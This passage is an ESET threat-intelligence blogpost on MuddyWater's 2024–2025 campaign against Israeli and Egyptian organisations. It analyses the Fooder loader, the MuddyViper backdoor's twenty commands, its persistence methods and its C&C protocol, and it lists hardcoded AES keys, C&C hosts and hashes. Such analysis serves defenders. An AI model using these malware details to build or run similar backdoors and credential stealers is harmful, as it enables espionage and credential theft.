{"id":9053,"date":"2025-12-02T12:00:00","date_gmt":"2025-12-02T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=9053"},"modified":"2026-06-14T20:08:18","modified_gmt":"2026-06-14T17:08:18","slug":"muddywater-snakes-by-the-riverbank","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2025\/12\/02\/muddywater-snakes-by-the-riverbank\/","title":{"rendered":"MuddyWater: Snakes by the riverbank"},"content":{"rendered":"<p>ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also referred to as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and publicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the objective of improving defense evasion and persistence. Among these tools is a custom Fooder loader designed to execute MuddyViper, a C\/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and its internal logic includes a custom delay function inspired by the game\u2019s mechanics, combined with frequent use of <span>Sleep<\/span> API calls. These features are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. The campaign also leverages credential stealers (CE\u2011Notes and LP\u2011Notes) and reverse tunneling tools (go\u2011socks5), long a favorite of MuddyWater operators.<\/p>\n<p>Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have documented its activities in multiple <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf\">ESET<\/a><br \/>\n<a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\">APT<\/a><br \/>\n<a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2024-q3-2024.pdf\">Activity<\/a><br \/>\n<a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">Reports<\/a>. Unlike previous campaigns of MuddyWater, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused, sophisticated, and refined approach.<\/p>\n<blockquote>\n<div><strong>Key points of this blogpost:<\/strong><\/div>\n<ul>\n<li>MuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique for Iran-aligned groups and somewhat atypical across the broader threat landscape.<\/li>\n<li>The group also used more advanced techniques to deploy MuddyViper, a new backdoor, by using a loader (Fooder) that reflectively loads it into memory and executes it.<\/li>\n<li>We provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go\u2011socks5 reverse tunnels.<\/li>\n<li>During this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, which is a historically noisy technique often characterized by mistyped commands.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>MuddyWater group overview<\/h2>\n<p>MuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North America. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has <a href=\"https:\/\/attack.mitre.org\/groups\/G0069\/\">links to the Ministry of Intelligence and National Security of Iran<\/a>.<\/p>\n<p>The group was first introduced to the public as MuddyWater by <a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-muddying-the-water-targeted-attacks-in-the-middle-east\/\">Unit 42<\/a> in 2017, whose description of the group\u2019s activity is consistent with ESET\u2019s profiling \u2013 a focus on cyberespionage, the use of malicious documents as attachments designed to prompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.<\/p>\n<p>Notable past activities include <a href=\"https:\/\/www.clearskysec.com\/wp-content\/uploads\/2020\/10\/Operation-Quicksand.pdf\">Operation Quicksand<\/a> (2020), a cyberespionage campaign targeting Israeli government entities and telecommunications organizations, which exemplifies the group\u2019s evolution from basic phishing tactics to more advanced, multistage operations; and a <a href=\"https:\/\/www.clearskysec.com\/muddywater-targets-kurdish-groups-turkish-orgs\/\">campaign targeting political groups and organizations in T\u00fcrkiye<\/a>, demonstrating the group\u2019s geopolitical focus, its ability to adapt social engineering tactics to local contexts, and reliance on modular malware and flexible C&amp;C infrastructure.<\/p>\n<p>Besides its frequent activity, MuddyWater operations are often noisy. The group is known for its persistent targeting of government, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly available tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy, Israel, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.<\/p>\n<p>ESET has documented multiple campaigns attributed to MuddyWater that highlight the group\u2019s evolving toolset and shifting operational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more recent campaigns demonstrate signs of technical refinement and increased precision.<\/p>\n<p>In March and April 2023, MuddyWater <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf\">targeted an unidentified victim in Saudi Arabia<\/a> by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk.<\/p>\n<p>The group conducted a <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">campaign in January and February 2025<\/a> that was notable for its operational overlap with Lyceum (an OilRig subgroup), further detailed in this publication. This latest overlap suggests an evolution in MuddyWater\u2019s modus operandi.<\/p>\n<p>The group\u2019s publicly documented custom tools include, for example, the <a href=\"https:\/\/www.gov.il\/BlobFolder\/reports\/maddy_water_2024\/en\/ALERT_CERT_IL_W_1858.pdf\">Bugsleep, Blackout<\/a>, <a href=\"https:\/\/www.cisa.gov\/news-events\/cybersecurity-advisories\/aa22-055a\">Small Sieve, Mori, and POWERSTATS backdoors<\/a>, as well as custom-compiled variants of <a href=\"https:\/\/www.security.com\/threat-intelligence\/seedworm-espionage-group\">open-source tools<\/a> such as <a href=\"https:\/\/github.com\/AlessandroZ\/LaZagne\">LaZagne<\/a> or <a href=\"https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\">CrackMapExec<\/a>. MuddyWater campaigns typically do not leverage or introduce new tools, malware, or techniques; instead, they are often noteworthy due to the targeting.<\/p>\n<p>While MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the manufacturing sector through spearphishing. The attack generated considerable noise and achieved little in terms of operational objectives.<\/p>\n<p>The campaign outlined in this publication shows what, for MuddyWater, seems to be an unprecedented advancement in toolset and technical execution.<\/p>\n<h3>Victimology<\/h3>\n<p>As previously mentioned, during this campaign, MuddyWater primarily targeted organizations in Israel, but also one in Egypt. Table 1 lists the victims by country and vertical. The campaign began on September 30<sup>th<\/sup>, 2024 and concluded on March 18<sup>th<\/sup>, 2025.<\/p>\n<p><a><\/a><em>Table 1. Victims by country and vertical<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"190\"><strong>Country<\/strong><\/td>\n<td width=\"453\"><strong>Vertical<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"190\"><strong>Egypt<\/strong><\/td>\n<td width=\"453\">Technology<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"17\" width=\"190\"><strong>Israel<\/strong><\/td>\n<td width=\"453\">Engineering #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Engineering #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Engineering #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Local Government #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Local Government #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Manufacturing<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Technology<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Transportation<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Utilities<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #4<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>One interesting thing to note about the victim in the utilities vertical is that they were also compromised by Lyceum on February 11<sup>th<\/sup>, 2025.<\/p>\n<h4>Overlap and cooperation with Lyceum<\/h4>\n<p>In early 2025, ESET Research identified an operational overlap between MuddyWater and <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes\/\">Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group<\/a>, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014 and is <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset_threat_report_t32021.pdf\">commonly believed to be based in Iran<\/a>. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX, and <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/oilrig-persistent-attacks-cloud-service-powered-downloaders\/\">a variety of downloaders<\/a> that leverage legitimate cloud services for C&amp;C communication. We have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector.<\/p>\n<p>During the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February 2025, MuddyWater initiated access through a spearphishing email containing a link to an installer for the <a href=\"https:\/\/syncromsp.com\/\">Syncro<\/a> remote monitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM tool, <a href=\"https:\/\/www.pdq.com\/\">PDQ<\/a>, and deployed a custom Mimikatz loader disguised as certificate files with <span>.txt<\/span> file extensions. Based on the observed activity, harvested credentials were probably used by Lyceum to gain access and assume control of operations within the targeted manufacturing-sector organization in Israel.<\/p>\n<p>This cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.<\/p>\n<h3>Attribution<\/h3>\n<p>The victimology, TTPs, and tooling observed in this campaign align with several of the newly documented capabilities and tools that we have previously attributed to MuddyWater. This assessment is based on the initial access method and the subsequent delivery of malicious tools \u2013 generally via spearphishing emails that contain links to download RMM software.<\/p>\n<h4>TTPs<\/h4>\n<p>MuddyWater operators continue to rely on predictable and script-based backdoors written in PowerShell and Go. Their targeting remains focused on the telecommunications, governmental, and oil and energy sectors.<\/p>\n<p>Initial access is typically achieved through spearphishing emails, often containing PDF attachments that link to installers for RMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of RMM tools including Atera, Level, PDQ, and SimpleHelp.<\/p>\n<p>Among the tools deployed by MuddyWater operators is also the VAX\u2011One backdoor, named after the legitimate software which it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.<\/p>\n<p>The group\u2019s continued reliance on this familiar playbook makes its activity relatively easy to detect and block.<\/p>\n<h4>Tools overlap<\/h4>\n<p>Additionally, we identified code overlaps between several of the newly documented tools and those we previously attributed to MuddyWater:<\/p>\n<ul>\n<li>LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer, that we previously associated with MuddyWater. During this campaign, we also observed a Mimikatz loader, which shares the same design and obfuscation methods as CE-Notes.<\/li>\n<li>We observed several new variants of MuddyWater\u2019s customized go\u2011socks5 reverse tunnels, which <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">the group used throughout 2024 and 2025<\/a>.<\/li>\n<li>In two instances, we observed the customized go\u2011socks5 reverse tunnels embedded in a new MuddyWater loader, internally named Fooder. In a dozen other cases, this loader was used to load MuddyWater\u2019s new backdoor, MuddyViper.<\/li>\n<li>Interestingly, MuddyViper and the CE-Notes\/LP-Notes\/Mimikatz loader variants use the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/seccng\/cng-portal\">CNG API<\/a> for data encryption and decryption. To the best of our knowledge, this is unique to Iran-aligned groups. Another trait these tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.<\/li>\n<\/ul>\n<h2>Toolset<\/h2>\n<p>In this blogpost, we document previously unknown, custom tools used by MuddyWater:<\/p>\n<ul>\n<li>Fooder loader \u2013 a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note that several versions of Fooder masquerade as the classic Snake game, hence the designation, MuddyViper. Another notable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the Snake game, combined with <span>Sleep<\/span> API calls. These features are intended to delay execution in an attempt to hide malicious behavior from automated analysis systems.<\/li>\n<li>MuddyViper backdoor \u2013 a previously undocumented C\/C++ backdoor that enables attackers to collect system information, download and upload files, execute files and shell commands, and steal Windows credentials and browser data.<\/li>\n<\/ul>\n<p>The rest of the toolset documented in this blogpost includes:<\/p>\n<ul>\n<li>CE-Notes, a browser-data stealer,<\/li>\n<li>LP-Notes, a credential stealer,<\/li>\n<li>Blub, a browser-data stealer, and<\/li>\n<li>several go\u2011socks5 reverse tunnels.<\/li>\n<\/ul>\n<h3>Fooder loader<\/h3>\n<p>Fooder is a 64-bit C\/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in Figure 1), with MuddyViper being the most frequently observed payload.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 1. Relationships between Fooder and its launcher and payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-1.png\" title=\"Figure 1. Relationships between Fooder and its launcher and payload\" width=\"\"><figcaption><em>Figure 1. Relationships between Fooder and its launcher and payload<\/em><\/figcaption><\/figure>\n<p>Fooder seems to be the internal name of this tool, based on its PDB paths:<\/p>\n<ul>\n<li><span>C:UserswinDesktopFooderDebugLauncher.pdb<\/span><\/li>\n<li><span>C:UserspcDesktopmainMy_ProjectFooderx64DebugLauncher.pdb<\/span><\/li>\n<\/ul>\n<p>Although we have only captured one sample of it, we believe that Fooder is executed by a simple launcher application, written in C. It has no string obfuscation and verbose logging to the console, and the PDB path left intact:<\/p>\n<p><span>C:UserspcsourcereposConsoleApplication7x64ReleaseConsoleApplication7.pdb<\/span><\/p>\n<p>We have observed one instance (SHA-1: <span>76632910CF67697BF5D7285FAE38BFCF438EC082<\/span>) of the component launching Fooder. Deployed under the name <span>%USERPROFILE%DownloadsOsUpdater.exe<\/span>, the launcher expects a process ID as a command line argument. Once executed, it attempts to duplicate the token of the specified process via the DuplicateTokenEx API, and then uses <span>CreateProcessAsUserA<\/span> to execute Fooder.<\/p>\n<p>Once executed, Fooder decrypts the embedded payload following these steps:<\/p>\n<ul>\n<li>The command line argument (<span>6<\/span>) is added to each byte of a hardcoded key, which produces the AES decryption key, shared across all samples, <span>6969697820511281801712341067111416133321394945138510872296106446<\/span>.<\/li>\n<li>A hardcoded value (<span>5<\/span>) is subtracted from each byte of the hardcoded payload.<\/li>\n<li>Finally, the hardcoded payload is decrypted using the WinCrypt API and the AES key.<\/li>\n<\/ul>\n<p>Fooder then loads the payload directly into memory using reflective techniques, allowing it to execute without relying on standard system calls or writing to disk.<\/p>\n<p>Once launched thus, Fooder has been used to deliver not only MuddyViper but also <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a>, an open-source utility capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also facilitates the deployment of go\u2011socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling attackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has previously utilized go\u2011socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network communication and data exfiltration.<\/p>\n<p>Note that several versions of Fooder masquerade as the Snake game \u2013 see the strings and mutexes highlighted in Figure 2 \u2013 its most frequently embedded payload.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Multiple Fooder instances masquerade as the Snake game\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-2.png\" title=\"Figure 2. Multiple Fooder instances masquerade as the Snake game\" width=\"\"><figcaption><em>Figure 2. Multiple Fooder instances masquerade as the Snake game<\/em><\/figcaption><\/figure>\n<p>Another notable characteristic of Fooder is its frequent use of a custom delay function (which implements the core logic of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Snake_(video_game_genre)\">Snake game<\/a>, where the player maneuvers the end of a growing line, often themed as a snake, to avoid obstacles and collect items) and the <span>Sleep<\/span> API calls. The delay in execution is achieved by mimicking the loop-based delay function: as in the Snake game, where each movement is controlled by a loop that waits for a short period before updating the game. The loop introduces execution delays that slow down the malware\u2019s behavior, helping it to evade tools that monitor for rapid malicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-3.png\" title=\"Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code\" width=\"\"><figcaption><em>Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code<\/em><\/figcaption><\/figure>\n<p>Fooder does not have any built-in persistence capability. However, in cases when Fooder\u2019s final payload is the MuddyViper backdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.<\/p>\n<h3>MuddyViper backdoor<\/h3>\n<p>MuddyViper, a previously undocumented backdoor written in C and C++, enables gaining covert access and control over compromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which might be the reason there is no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&amp;C server throughout its execution, such as the following:<\/p>\n<ul>\n<li><span>[+] Persist: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Hi,I am Live &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span><\/li>\n<li><span>[+] Persist: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Hi,First Time &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span><\/li>\n<li><span>[-] Persist: failed Create task !!!!<\/span><\/li>\n<\/ul>\n<p>The backdoor also keeps a lengthy list of 150+ process names and details about the respective products to be able to send detailed reports about the security tools detected in the compromised environment, even though adding the details could have been easily implemented on the server side:<\/p>\n<ul>\n<li><span>[&gt;] Process: aciseagent.exe ~~&gt; (Cisco Umbrella Roaming Security) &#8211;&gt; (Security DNS) found!<\/span><\/li>\n<li><span>[&gt;] Process: acnamagent.exe ~~&gt; (Absolute Persistence) &#8211;&gt; (Asset Management) found!<\/span><\/li>\n<li><span>[&gt;] Process: acnamlogonagent.exe ~~&gt; (Absolute Persistence) &#8211;&gt; (Asset Management) found!<\/span><\/li>\n<\/ul>\n<p>This behavior results in substantial network traffic.<\/p>\n<p>MuddyViper has two methods of establishing persistence:<\/p>\n<ul>\n<li>Its installation directory can be configured as a Windows Startup folder, by setting the following registry values to <span>%APPDATALOCAL%MicrosoftWindowsPPBCompatCacheManagerCache<\/span>:\n<p><span>\u25cb<\/span><br \/>\n<span><span>HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup<\/span>. <\/span><\/p>\n<p><span>\u25cb<\/span><br \/>\n<span><span>HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup<\/span>. <\/span><\/p>\n<\/li>\n<\/ul>\n<ul>\n<li>A scheduled task named <span>ManageOnDriveUpdater<\/span> can launch MuddyViper from the path on each system start.<\/li>\n<\/ul>\n<p>MuddyViper supports 20 backdoor commands \u2013 see Table 2 for details of all of them \u2013 notably including the ability to open and operate reverse shells, download, upload, and execute files, report the running security tools, steal user credentials and data from a variety of browsers, set up its own persistence, and uninstalling itself.<\/p>\n<p><em>Table 2. MuddyViper backdoor commands<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td><strong>ID<\/strong><\/td>\n<td><strong>Arguments<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<td><strong>Response<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><span>200<\/span><\/td>\n<td>N\/A<\/td>\n<td>N\/A<\/td>\n<td><span>0<\/span>, via the <span>GET \/adad<\/span> or <span>GET \/aq36<\/span> request, to obtain a backdoor command.<\/td>\n<\/tr>\n<tr>\n<td><span>207<\/span><\/td>\n<td>N\/A<\/td>\n<td>Decrypts the embedded <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a> tool and reflectively loads it in a new thread. This open-source tool can steal credentials, history, and other information from web browsers.<br \/>MuddyViper then compresses the collected data (into a file named <span>CacheDump.zip<\/span>) and uploads it to the C&amp;C server.<\/td>\n<td>Collected browser data, via the <span>GET \/mq65<\/span> request.<br \/>In case of an error, a custom status message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>300<\/span><\/td>\n<td><span>&lt;command_line&gt;<\/span><\/td>\n<td rowspan=\"3\">Launches a reverse shell using:<\/p>\n<div> \u2022 the provided command line (command ID <span>300<\/span>)<\/div>\n<div> \u2022 <span>C:windowssystem32cmd.exe<\/span> (command ID <span>301<\/span>)<\/div>\n<div> \u2022 <span>C:windowssystem32WindowsPo<wbr><\/wbr>werShellv1.0Powershell.exe<\/span> (command ID <span>302<\/span>)<\/div>\n<div>Then, in a loop, uploads the process output to the C&amp;C server and interprets the server response (see command IDs <span>350-352<\/span>) until interrupted.<\/div>\n<\/td>\n<td rowspan=\"6\">Process output, via the <span>GET \/oi32<\/span> request.<br \/>In case of an error, a custom status message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>301<\/span><\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>302<\/span><\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>350<\/span><\/td>\n<td>N\/A<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. Sleeps for a preconfigured amount of time \u2013 for the reverse shell loop, the default is one second.<\/td>\n<\/tr>\n<tr>\n<td><span>351<\/span><\/td>\n<td>Sleep time (in milliseconds)<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. Configures the sleep time for the reverse shell loop \u2013 the default is one second.<\/td>\n<\/tr>\n<tr>\n<td><span>352<\/span><\/td>\n<td>Input for the reverse shell.<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. Passes the provided argument to the running reverse shell.<\/td>\n<\/tr>\n<tr>\n<td><span>360<\/span><\/td>\n<td>N\/A<\/td>\n<td>Not implemented, likely related to the reverse shell API.<\/td>\n<td>A custom error message:<br \/><span>[-] Agent does not have an active pipe<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>400<\/span><\/td>\n<td>Flag.<\/td>\n<td>Must follow command ID <span>401<\/span>. It confirms that the C&amp;C server has successfully received a part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in command ID <span>401<\/span> to 10 seconds.<\/td>\n<td>No response, unless this command is issued outside of a pending file upload process, it sends a custom error message:<br \/><span>[-] Agent does not have an DOWNLOAD file<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>401<\/span><\/td>\n<td>Sleep time (in milliseconds), filename.<\/td>\n<td>Initiates a file upload operation from the specified local file to the C&amp;C server in chunks, with the specified sleep time between each upload.<\/td>\n<td>Contents of the specified file, via a series of <span>GET \/dadw<\/span> requests.<\/td>\n<\/tr>\n<tr>\n<td><span>500<\/span><\/td>\n<td>Data chunk.<\/td>\n<td>Must follow command ID <span>501<\/span>. Writes the received data chunk into a previously created and opened local file.<\/td>\n<td>A custom error message, if the operation fails.<\/td>\n<\/tr>\n<tr>\n<td><span>501<\/span><\/td>\n<td>Sleep time (in milliseconds), filename.<\/td>\n<td>Downloads a file from the C&amp;C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each data chunk. Deletes the file if the connection cannot be established after six consecutive attempts.<\/td>\n<td>A series of <span>GET \/dadwqa<\/span> requests, to request the file contents.<\/td>\n<\/tr>\n<tr>\n<td><span>700<\/span><\/td>\n<td>Sleep time (in milliseconds)<\/td>\n<td>Configures the sleep time between connection attempts to the specified value (default is 60 seconds).<\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>800<\/span><\/td>\n<td>N\/A<\/td>\n<td>Enumerates running processes, searching for selected security tools from an extensive hardcoded list.<\/td>\n<td>For each detected process, sends a report with the following information, populated from that hardcoded table:<br \/><span>[&gt;] Process: &lt;process_name&gt; ~~&gt; (&lt;product_name&gt;) &#8211;&gt; (&lt;category&gt;) found!<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>805<\/span><\/td>\n<td>Timeout (in milliseconds)<\/td>\n<td>Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C&amp;C server. Uses the provided argument as a timeout for the dialog.<\/td>\n<td>Collected credentials, via the <span>GET \/rq13<\/span> request:<br \/><span>[+] creds ~~&gt; Username:&lt;username&gt; ~~&gt; Password:&lt;password&gt;<\/span><br \/>If not successful, a custom error message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>806<\/span><\/td>\n<td>N\/A<\/td>\n<td>Sets up persistence via a scheduled task named <span>ManageOnDriveUpdater<\/span>. The backdoor copies itself to its installation path, unless it is already running from there.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td><span>900<\/span><\/td>\n<td>N\/A<\/td>\n<td>Uninstalls itself. First, clears persistence set via a Windows Startup Folder and then deletes itself.<br \/>Note that this action will not clear the persistence via a scheduled task that can be set by the backdoor command ID <span>806<\/span>.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td><span>905<\/span><\/td>\n<td>N\/A<\/td>\n<td>Terminates the current backdoor process.<\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>906<\/span><\/td>\n<td>N\/A<\/td>\n<td>Relaunches itself (via the <span>CreateProcessW<\/span> API) and terminates the current process.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td>other<\/td>\n<td>N\/A<\/td>\n<td>N\/A<\/td>\n<td><span>[-] Agent statusCode I don&#8217;t have it<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>One of the commands listed in Table 2, with ID <span>805<\/span>, displays a fake Windows Security dialog in an attempt to entice the victim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater\u2019s LP-Notes stealer (see <em><a href=\"#LP-Notes%20credential%20stealer\">LP-Notes credential stealer<\/a><\/em>).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-4.png\" title=\"Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\" width=\"\"><figcaption><em>Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID <\/em><span>805<\/span><em>)<\/em><\/figcaption><\/figure>\n<p>Another command, with ID <span>900<\/span>, aims to remove MuddyViper from the compromised machine and clear its persistence; however, the command does not remove all traces of the backdoor.<\/p>\n<h4>Network protocol<\/h4>\n<p>To communicate with its C&amp;C server, MuddyViper uses HTTP GET requests (via the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winhttp\/about-winhttp\">WinHTTP API<\/a>) over port <span>443<\/span>, with the <span>WINHTTP_FLAG_SECURE<\/span> flag configured to use SSL\/TLS. Two C&amp;C servers have been observed: <span>processplanet[.]org<\/span> and <span>35.175.224[.]64<\/span>.<\/p>\n<p>Both directions of communication AES-CBC encrypt the data, using the CNG API with the key (used across samples) <span>0608101047106453101617106423101013101012101083109710108585106969 <\/span>and the IV <span>0<\/span>.<\/p>\n<p>In the backdoor \u2192 server direction of the communications:<\/p>\n<ul>\n<li>Each endpoint URI supported by the C&amp;C server can be used by the backdoor for a specific type of request, such as requesting a command, uploading a file, or sending a custom status message.<\/li>\n<li>Additional data for the C&amp;C server is included in the HTTP request body, which is unconventional for HTTP GET requests.<\/li>\n<li>The <span>User-Agent<\/span> string is <span>A WinHTTP Example Program\/1.0<\/span>, a remnant of the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/winhttp\/nf-winhttp-winhttpopen#examples\">example code<\/a> for the WinHttpOpen API.<\/li>\n<li>The connection, send, receive, and response timeouts are set to 30 seconds.<\/li>\n<li>Default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID <span>700<\/span>.<\/li>\n<li>Upon failure, connection attempts are retried up to 10 times.<\/li>\n<li>Prior to encryption, the data is always formatted as <span>&lt;computer_name&gt;\/&lt;username&gt;*&lt;data&gt;<\/span>.<\/li>\n<\/ul>\n<p>In the server \u2192 backdoor direction of the communications:<\/p>\n<ul>\n<li>The HTTP status code determines the backdoor command ID.<\/li>\n<li>The backdoor command arguments are included in the HTTP response body.<\/li>\n<\/ul>\n<h3>CE-Notes browser-data stealer<\/h3>\n<p>CE-Notes is a browser-data stealer that we named after the filename \u2013 <span>ce-notes.txt<\/span> \u2013 used to stage stolen data on disk. We discovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an organization in 